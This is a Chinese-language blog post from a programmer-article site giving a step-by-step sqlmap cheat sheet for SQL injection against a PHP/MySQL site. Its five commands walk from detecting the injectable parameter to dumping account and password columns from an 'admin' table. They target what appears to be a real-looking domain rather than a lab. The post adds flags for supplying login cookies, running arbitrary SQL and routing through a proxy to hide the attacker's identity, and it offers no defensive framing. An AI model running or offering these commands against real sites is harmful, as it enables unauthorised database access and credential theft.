欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

sqlmap注入常见用法一条龙

程序员文章站 2022-09-19 17:58:49
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangonlin也不愿意麻烦去翻帮助界面,我自己也是把很...
sqlmap是一个灰常强大的sql注入检测与辅助工具,但是由于没有图形界面,基本上用起来比较麻烦,导致很多人可能宁愿用havij或者是pangonlin也不愿意麻烦去翻帮助界面,我自己也是把很多语句贴到了一个记事本里面用,其实真正用起来也就5,6句,也不会太复杂,下文以php+mysql为例:
  1. 检查注入点
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11
  2. 数据库信息
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 –dbs
  3. 指定库名列出所有表
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 –tables
  4. 指定库名表名列出所有字段
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin –columns
  5. 指定库名表名字段dump出指定字段
    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password –dump

有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:

  • –cookie=COOKIE                                       在需要登录的地方,需要登录后的cookie
  • –proxy=”http://127.0.0.1:8087″                  使用HTTP代理隐藏自己的身份,比如使用*等
  • –sql-query=QUERY                                     执行一个sql语句,不一定支持

过程的几张图如下:

sqlmap注入常见用法一条龙sqlmap注入常见用法一条龙sqlmap注入常见用法一条龙sqlmap注入常见用法一条龙

sqlmap注入常见用法一条龙